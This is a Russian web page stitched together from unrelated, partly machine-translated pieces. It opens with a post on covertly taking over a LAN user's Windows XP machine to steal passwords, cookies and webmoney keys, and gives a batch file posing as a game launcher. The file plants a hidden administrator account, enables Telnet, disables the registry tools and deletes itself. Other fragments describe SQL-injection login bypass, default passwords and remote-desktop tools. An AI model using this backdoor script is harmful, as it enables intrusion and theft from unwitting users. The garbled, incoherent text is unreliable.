Удаленное управление компьютером без ведома пользователя. Сетевой доступ к чужому экрану: подключаемся удаленно к компьютеру через интернет

Привет всем, это моя первая статья на хабре, так что не судите строго. В этом посте я опишу как можно получить удаленный доступ к компьютеру пользователя в вашей локальной сети через командную строку, обходя все антивирусы и немного зная синтаксис командной строки Windows. Статья предназначена для использования только на Windows XP, но при желании можно переписать код под любую другую ОС семейства Windows. Итак, приступим. В целом, статья написана для пользователей начального уровня. Самая главная цель - это заполучить нужные данные (пароли, явки, дачи, доступ к почтовым ящикам, файлы ключей webmoney, куки и прочая важная перхоть) и уйти незаметно, не оставив следов проникновения. Итак, начнем, я нахожусь в локальной сети имеющей порядка 5000 пользователей, сеть со статикой или dhcp не имеет значения, мне розан ip адрес и я счастлив. В сети имеется тьма подсетей, роуты которых прописаны на серваке. MAC адрес компа прописан у админа сети, так как в моем случае, это было условие подключения к сетке, таким образом мой мак засветится в случае чего. Во избежание быть найденным, первым делом устанавливаем виртуальную машину (использовал VmWare 5.1), устанавливаем на нее XP, сканер портов (использовал SuperScan 3.00 Скачать можно ) и запускаем службу Telnet. Подключаем виртуальную машину к сети с помощью NAT и получаем таким образом совершенно другой mac-адрес машины смотрящей в сеть. Все гуд виртуалку поставили, идем дальше. Открываем обычный блокнот и пишем батник следующего содержания:

Это сложный процесс для пользователей без особых технических знаний. Программное обеспечение доступно в коммерческих версиях, которые добавляют дополнительные функции, но с высокими значениями. Некоммерческая бесплатная версия является хорошим выбором для базового удаленного доступа, но если вам нужно печатать удаленно, другие программы имеют более простой процесс.

Программы не дружественны к брандмауэру и требуют определенного порта для передачи на каждый хост, к которому необходимо получить доступ. Это не так элегантно, как доступ к веб-сайту и нажатие на компьютер, к которому вы хотите подключиться, но он работает.

@Echo off
Net user Admin_Support lop /add >nul
Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul
Net accounts /maxpwage:unlimited >nul sc config TlntSvr start= auto >nul
Sc start TlntSvr >nul
Reg add «HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList » /v Admin_support /t REG_DWORD /d 0 >null
Reg add »HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System» /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Reg add «HKCU\SOFTWARE\POLICIES\Microsoft\MMC» /v RestrictPemitSnapins /t Reg_dword /d 1 /f >nul del %SestemRoot%\system32\compmgmt.msc >nul
del Start_game.bat

И хотя он не обладает удаленной возможностью печати, у него есть некоторые очень хорошие функции. Как и в некоторых других программах, мне пришлось открыть порт на брандмауэре. Пульт дистанционного управления хост-компьютера работал хорошо и отлично реагировал. Мне удалось настроить размер экрана, просто перетащив края окна клиента.

Программное обеспечение также имеет несколько плагинов, встроенных в систему. Техникам поддержки клиентов, вероятно, понравится подключаемый модуль «проводник», который дает удаленному пользователю расширенный вид главного компьютера, как в файловом менеджере.

Метки: вирусы, взлом, безопасность, информационная безопасность

Дискуссия о том, что представляет собой Интернет семантически — Сеть или Огромную Помойку – не имеет отношения к главной особенности данной среды. Речь идет о возможности связи удаленных друг от друга устройств между собою. В сети разделяют активные поставщики данных – сервера, и пассивные – обычные компьютеры пользователя (клиенты). Один и тот же компьютер может выступать как в роли клиента, так и в роли сервера – очень часто именно так и обстоит дело.

Как опасное ПО может повлиять на вас

Встроенная поддержка перенаправленной печати не поддерживается. Эти программы не были разработаны с плохими намерениями, но содержат функции, которые могут использоваться для вредоносных целей. С таким количеством законных программ, которые злоумышленники могут использовать в незаконных целях, может быть трудно определить, какие из них представляют какой-либо риск. Например, программы удаленного администрирования часто используются системными администраторами и справочными службами для диагностики и решения проблем, возникающих на компьютере пользователя.

Примером взаимодействия клиента и сервера является доступ к веб-страницам через Интернет. Компьютер-сервер получает запрос от удаленного пользователя-клиента и выдает ему содержимое очередной страницы. Но нас интересует удаленный сервис совсем иного рода – возможность подключения к рабочему столу на другом компьютере, т.е. то, каким образом подключиться к другому компьютеру через Интернет и видеть все, что происходит на его экране.

Однако, если программа была установлена ​​на вашем компьютере злонамеренным пользователем, без вашего ведома, у этого пользователя будет удаленный доступ к компьютеру. Полностью контролируя ваш компьютер, злоумышленник может использовать его для выполнения всего, что угодно.

Как защитить себя от опасного ПО

Поскольку могут быть обоснованные причины для обоснования наличия опасного ПО на вашем компьютере, антивирусные решения могут оказаться неспособными определить, угрожает ли вам программа риска. Обнаружение и удаление потенциально опасного ПО Существует множество причин, по которым вы подозреваете, что опасная программа, обнаруженная механизмом Антивируса Касперского, представляет собой угрозу. В этих случаях антивирусное программное обеспечение Касперского помогает вам избавиться от опасного ПО. В тех случаях, когда обнаружены программно-опасные программы, но вы обязательно согласны с ними, можно решить, представляют ли они риск для ваших устройств или данных. Возможность не обнаруживать рискованное ПО. . Если у вас есть какие-либо вопросы об информационной безопасности, перейдите к концу отчета и используйте раздел комментариев.


Зачем может понадобиться такое удаленное подключение? Ну, например, для того, чтобы помочь коллеге или другу в осуществлении какой-либо непонятной для того операции. Многие компании используют такое удаленное подключение для контроля работы собственных сотрудников, а также для помощи удаленным клиентам. Словом, было бы подключение, а как его использовать – придумаем.

Колонка отвечает на вопросы, оставленные читателями каждый четверг. Хакеры действительно кажутся невероятными, вторгаются в системы, откладывают сайты и получают секретную информацию. Однако их действия часто легче, чем предполагалось, благодаря наличию абсурдных дыр в безопасности, которые могут быть использованы даже людьми, не обладающими большими знаниями в области информатики. И один из секретов хакеров - это выбор правильных целей. В столбце «Цифровая безопасность» приведены некоторые примеры.

Оттуда можно было изменить сайт, поскольку он меняет любой файл на самом компьютере. Это технология управления интернет-сайтами. Однако сейчас трудно найти сайты с этим недостатком. Совместное использование без отказа пароля и аутентификации. Этот общий доступ, предназначенный для компьютеров в локальной сети, был доступен в Интернете, позволяя любому получить доступ к локальным файлам на компьютере. Все общие папки будут отображаться и могут быть прочитаны, изменены или удалены.

Имеется два способа сделать такой коннект возможным: при помощи встроенных в Windows инструментов или с помощью программ сторонних производителей.

Рассмотрим эти способы по порядку.

Встроенный инструментарий Windows

Стандартный метод подключиться к чужому компьютеру и его рабочему столу заключается в использовании инструмента Windows, который так и называется – «Подключение к удаленному рабочему столу» . Чтобы приконнектиться к другому компьютеру, поступаем так:

Однако даже тот, кто установил пароль, избежал атаки. Для этого менеджер сайта должен «установить» программное обеспечение на сайте. Во время процесса установки настроен пароль. Во многих случаях эти установщики забыты. Чтобы взломать сайт, все, что нужно хакеру, это получить доступ к установщику, выполнить параметры, отображаемые на экране, и перенастроить административный пароль.

Сегодня у установщиков есть функции блокировки, поэтому они не запускаются более одного раза - потому что многие люди по-прежнему забывают стереть установщик после его использования. Файл всегда был доступен по тому же адресу. Чтобы взломать сайт, просто проверьте, существует ли файл, загрузите его и отмените защиту, используемую для хранения пароля. Лазейка была сильно использована в конце года. Чтобы решить проблему, было бы достаточно предотвратить чтение файла.

Переходим в меню «Пуск» и вызываем упомянутую выше службу.

Перед нами откроется окошко примерно такого вида:

В поле «Компьютер» следует ввести IP-адрес уделенной системы или его сетевое имя.

Если удаленная система готова предоставить вам в распоряжение свой рабочий стол, то через несколько секунд вы увидите его у себя на экране. С другой стороны соединения должны быть настроены права на удаленный доступ к рабочему столу для вас, как клиента.

Он работает следующим образом: пользователь и пароль, введенные в форму, необходимо искать в базе данных: есть ли пользователь «такой»с паролем «такой»? И программа должна использовать одинарные кавычки, чтобы определить «такое» и «такое», чтобы дифференцировать аргумент запроса.

Путем размещения одинарных кавычек в форме входа в систему хакер разбивает логику поиска, а остальная часть больше не является вопросом, который нужно запросить, то есть база данных не будет искать пользователя с этим именем, но интерпретировать, что было как часть запроса. Здесь начинается волшебство: «или» - это английское слово, означающее «или», и изменяет логику «вопроса», которую получает база данных.

Пересылка через Интернет такого контента, как изображение с экрана компьютера, — достаточно затратное дело. Не всегда существует необходимость в высоком качестве передаваемого изображения. Иногда достаточно низкого экранного разрешения. Для настройки этого и других параметров чужого рабочего стола нужно нажать на кнопку «Параметры» и назначить нужные опции.

Поскольку 1 всегда будет 1, база данных вернет всех существующих пользователей в систему. Поскольку программное обеспечение понимает, что только один пользователь входит в систему, он будет использовать первый результат, присутствующий в базе данных, который обычно является административным пользователем.

Результатом этого является полный доступ к системе, без необходимости знать пользователя и пароль. Программное обеспечение, защищенное от этого отказа, не позволяет отправлять одиночные кавычки в команду базы данных, а также проверяет, что запрос был возвращен нескольким пользователям - чего-то, чего никогда не должно было случиться.


Окно параметров содержит несколько закладок и множество опций, обсуждать которые детально мы не имеем места и возможности. Перечислим их вкратце, чтобы было понятно, о чем идет речь. В окне настроек можно регулировать и указать такие вещи:

Адреса? Эта программа может изменить страницу или даже дать серверному управлению хакеру. Хакеру не нужно знать, как разработать эту специальную программу, потому что ее можно найти в Интернете. Есть несколько «ароматов» - просто выберите. Сайты, которые невосприимчивы к этой ошибке, несут имена и авторизированные адреса в коде, то есть программа поймет, что «контент» имеет недопустимое значение и игнорирует его. Для предотвращения взлома клиентов хостинг-провайдеры часто препятствуют загрузке интернет-адресов в код сайта, тем самым защищая даже уязвимые места атаки.

  • Разрешение экрана чужого рабочего стола и качество цвета.
  • Перенос через Интернет настроек другого компьютера, типа клавиатурных комбинаций. Чужие настройки вытесняют собственные на время соединения.
  • Программу, запускаемую в момент обращения к рабочему столу иного пользователя. Имеется в виду программа на подключаемом компьютере.
  • Многие другие характеристики, перечисленные на вкладке «Дополнительно», , в том числе и разнообразные визуальные эффекты.

Знакомьтесь «Team Viewer».-

Однако долгое время этот сбой позволял вторгнуться на многие веб-сайты и просто поместить в веб-браузер определенный адрес, чтобы активировать его. Пароль по умолчанию При настройке сайта или системы администратор оставляет тот же пароль, который был установлен на заводе. Все, что нужно хакеру, это проверить руководство по программному обеспечению или оборудованию, проверить пароль по умолчанию и попробовать. В случае успеха вторжение завершено.

Сегодня многие программные средства генерируют случайные пароли во время их установки. Аппаратные устройства могут уже использовать другой пароль для каждого продукта на основе серийного номера или другого идентификатора, который доступен. Эти сценарии могут иметь много функций, включая удаление, создание или загрузку файлов.

Будем считать, что вы настолько далеки от обсуждаемых вопросов, что не знаете о существовании замечательной программы «Team Viewer». . С ее помощью соединиться через Интернет с другой системой еще проще, чем при помощи встроенных в Windows инструментов. Программа имеет богатый интерфейс и наделена разработчиками большими возможностями. Для домашнего использования данная программа совершенно бесплатна. Подключение с ее помощью через Интернет ничем не ограничено, кроме фантазий ее создателей. Если вас заподозрят в коммерческом использовании программы, то время коннекта ограничат прямо через сеть.



Как правило, коды, которые используют уязвимости, совсем не хороши, поскольку они работают в некоторых условиях ошибки программного обеспечения. Поскольку он использовал функцию самой системы, она работала в 100% случаев без каких-либо непредвиденных обстоятельств.

По этой причине эта уязвимость широко используется, особенно бразильскими хакерами, и ее все еще можно увидеть в некоторых наборах веб-атак, даже если она устарела. Поскольку это один из «самых чистых» недостатков, нет смысла прекращать его использование, если компьютер жертвы уязвим.



Статьи по теме: